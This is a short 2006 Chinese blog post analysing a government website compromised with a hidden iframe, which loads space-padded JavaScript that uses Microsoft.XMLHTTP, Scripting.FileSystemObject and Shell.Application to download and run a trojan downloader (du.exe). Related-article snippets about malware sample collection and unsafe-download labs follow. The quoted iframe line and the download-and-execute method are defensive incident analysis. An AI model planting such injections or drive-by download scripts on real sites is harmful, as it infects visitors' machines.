又一个下载恶意文件的政府网站

最新推荐文章于 2024-09-25 16:07:35 发布
最新推荐文章于 2024-09-25 16:07:35 发布 · 104 阅读 · 0
文章标签:

#shell #javascript #ViewUI

本文分析了一个恶意脚本,该脚本通过隐藏的iframe注入并利用Microsoft.XMLHTTP和Scripting.FileSystemObject下载并执行了名为du.exe的文件。此文件被Kaspersky识别为Trojan-Downloader.Win32.Delf.aul。

endurer 原创

2006-08-22 第1

首页有3处地方被加入:
/--------
<iframe height=0 width=0 src="hxxp://***object.cnic**b.com/15"></iframe>
--------/

hxxp://***object.cnic**b.com/15 的内容为插入许多空格的JavaScript脚本,利用 Microsoft.XMLHTTP 和 Scripting.FileSystemObject 下载文件 利用 Microsoft.XMLHTTP 和 Scripting.FileSystemObject 下载文件 hxxp://***object.cnic**b.com/15/du.exe, 保存为 IE临时文件夹中的 test.exe,并利用Shell.Application 对象 的 ShellExecute 方法 来运行。

du.exe 采用 nSPack 1.3 加壳。Kaspersky 报为 Trojan-Downloader.Win32.Delf.aul

iteye_6637
关注
Pcap数据包资源下载汇总-恶意威胁流量
村中少年的专栏
01-20 4356
介绍一些恶意威胁流量pcap数据包的资源
多线程下载恶意样本
Keo的博客
05-07 937
最近在做威胁情报库,写了个脚本搜集恶意样本,需要在malshare上注册账号(免费)。 virustotal虽然是高级会员,但是用不了feed api,可恶啊,不知道为什么,有没有懂的老哥 # 05/07/2021 Modified by Keo <Thisiskkya@gmail.com> # Download Malware Samples daily with muti threads # Thanks for Jun Xie <jxie2004@gmail.com> for
Pikachu靶场——不安全的文件下载(Unsafe Filedownload)
来日可期的博客
10-04 2014
文件下载功能在很多web系统上都会出现,一般我们当点击下载链接,便会向后台发送一个下载请求,一般这个请求会包含一个需要下载的文件名称,后台在收到请求后会开始执行下载代码,将该文件名对应的文件response给浏览器,从而完成下载。如果后台在收到请求的文件名后,将其直接拼接到下载文件的路径中而不对其进行安全判断的话,则可能会引发不安全的文件下载漏洞。
pikachu靶场-7 不安全的文件下载和上传
weixin_52180702的博客
12-13 1283
很多网站都会提供文件下载功能,即用户可以通过点击下载链接,下载到链接所对应的文件。但是,如果文件下载功能设计不当,则可能会导致攻击者可以通过构造文件路径,从而获取到后台服务器上的其他的敏感文件。文件下载功能在很多web系统上都会出现,一般我们当点击下载链接,便会向后台发送一个下载请求,一般这个请求会包含一个需要下载的文件名称,后台在收到请求后 会开始执行下载代码,将该文件名对应的文件response给浏览器,从而完成下载
恶意样本下载
catgray的博客
08-28 3685
import requests import json #GET /file/81b69bf08aa50ff8896c11bb289f3656ac1df8ba3bba7a5444fa1ef97c9d14b5.7z HTTP/1.1 headers = { "Host": "www.virusign.com", "Connection": "keep-alive", "Cache-Control":...
pikachu之不安全的文件下载概述
qq_42728977的博客
12-26 1143
不安全的文件下载概述 文件下载功能在很多web系统上都会出现,一般我们当点击下载链接,便会向后台发送一个下载请求,一般这个请求会包含一个需要下载的文件名称,后台在收到请求后 会开始执行下载代码,将该文件名对应的文件response给浏览器,从而完成下载。 如果后台在收到请求的文件名后,将其直接拼进下载文件的路径中而不对其进行安全判断的话,则可能会引发不安全的文件下载漏洞。 此时如果 攻击者提交的不...
政府网站模板下载,免费政府网站源码下载政府机关网站模板管理系统
11-30
政府网站模板下载与免费政府网站源码是网页设计与开发中的一个重要领域,尤其在信息化建设日益普及的今天,政府机关的在线形象对于公众服务、信息传递以及政务公开至关重要。政府网站模板管理系统则扮演了简化这一...
政府管理系统源码-基于springboot的政府管理系统设计与实现-政府管理网站代码-政府管理项目代码
最新发布
08-19
在文件名称列表中,提到的“论文.doc”可能是一份关于该政府管理系统的学术论文或设计文档,它可能详细描述了系统的设计理念、架构设计、实现技术以及未来的发展方向等。而“study-coder-YJangCode-ad3.zip”和...
大气深蓝政府网站模板下载及PageAdmin CMS系统介绍
本文件标题为“政府网站模板下载-很大气的政府网站模板”,其核心内容是提供一个适用于政府机关、行政事业单位网站搭建的网站模板,模板风格为深蓝色,整体设计风格沉稳、大气,符合政府网站对严肃性、权威性的视觉...
国微CMS政府网站系统
08-16
作为一个内容管理系统,它提供了丰富的模板选择和强大的自定义功能,使得用户可以根据自身需求定制出独特的网站风格。此外,它的模块化设计允许用户轻松添加或移除各种功能,如新闻发布、在线留言、文档管理等,大大...
两个会自动下载恶意程序文件的政府网站
Purpleendurer@优快云
08-18 4273
endurer 原创2006-08-18 第1版打开这两个网站时,Kaspersky 提示发现 Exploit.JS.ADODB.stream.e。第一个网站 hxxp://www.jing***.gov.cn的首页加入代码:--------<TR><script language=javascript src=bbs.js></script><TD vAlign=top align=
恶意下载文件
m0_62207482的博客
04-03 483
说人话就是,浏览器并不认得这是什么类型,也不知道应该如何展示,只知道这是一种二进制文件,因此遇到content-type为application/octet-stream的文件时,浏览器会直接把它下载下来。意思是未知的应用程序文件,浏览器一般不会自动执行或询问执行。在某些下载文件的场景中,服务端可能会返回文件流,并在返回头中带上Content-Type:application/octet-stream,告知浏览器这是一个字节流,浏览器处理字节流的默认方式就是下载
MpCmdRun恶意文件下载
Fly_鹏程万里
09-29 3204
文章前言 Windows Defender是Windows 10系列自带的一款系统保护程序,可以对系统中的恶意程序、恶意行为进行查杀,与此同时,我们可以使用Windows Defender自带的命令执行工具"MpCmdRun.exe"来实现远程下载恶意文件的目的,但是免杀好像还是不太可靠,不过我们可以在cmd中关闭Windows Defender,所以这样一来,一结合就变得有意思多了,不管在使用该思路的过程中还需要权限提升,但是CS因为在后渗透测试中有很好的辅助功能,所以总体来说还是划算的~ 具体实现
两个下载恶意程序文件的政府网站换花样了
Purpleendurer@优快云
08-22 3134
endurer 原创2006-08-22 第1版今天又看了看 两个会自动下载恶意程序文件的政府网站 一文中的两个网站,发现换了花样。两个网站首页末均被加入:/---------<iframe src="hxxp://www.wzx***qy.com/" width="0" height="0" frameborder="no" border="0" marginwidth="0"
进程异常行为-访问恶意下载源 解决方案_安全行为分析对devops的好处
weixin_39902870的博客
11-24 185
云本地架构、持续集成和持续交付(CI/CD)、devops和站点可靠性工程(SRE)等技术和实践使组织能够创新并加速软件产品的交付。但是,它们也扰乱了传统的软件开发和维护生命周期(SDLC),并显著地改变了企业需要做什么才能成功地保护应用程序和业务服务。为了帮助组织确保应用程序的安全交付,TrueFort开发了一种保护和监控云工作负载的方法,称为应用程序安全行为分析(ASBA)。ASBA...
进程异常行为-访问恶意下载源 解决方案_不要忽略服务器上的异常进程
weixin_39889544的博客
11-24 343
在之前的文章中,我们看到了ADAudit Plus的用户行为分析(UBA)功能如何使管理员能够监视用户登录活动以识别受感染的帐户。ADAudit Plus中的UBA还可以帮助您跟踪成员服务器上的任何异常进程,以防御外部威胁。在此文章中,我们将研究企业如何跟踪成员服务器上的进程活动。跟踪主机上的异常进程 想象一下这样一种情况:员工点击恶意链接并下载恶意软件,该恶意软件会在网络中传播恶意数据并进行加密...
免费恶意样本资源
debugeeker的专栏
10-13 4710
恶意软件研究员经常要寻找恶意样本来获取威胁情报和开发防御方案。 下面是一些免费的恶意样本资源站,研究的人请下载到虚拟机上玩,后果自负! ANY.RUN https://app.any.run/submissions/ 每天更新,需要注册 Contagio Malware Dump http://contagiodump.blogspot.com/ 每天更新,下载后解压需要发邮件给博主获取密码 DAS MALWERK https://dasmalwerk.eu/ 更新频率不知,随便下载
推荐一些免费下载恶意样本网站
信息安全
09-25 6508
前一阵微步下载样本开始收费,算是又断了一个很好的白嫖途径。目前工作需求是不定期获取一批不同家族样本,看了看微步基础会员每天5次的下载限制,我默默把微步网页点了X,选择其他网站进行白嫖。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值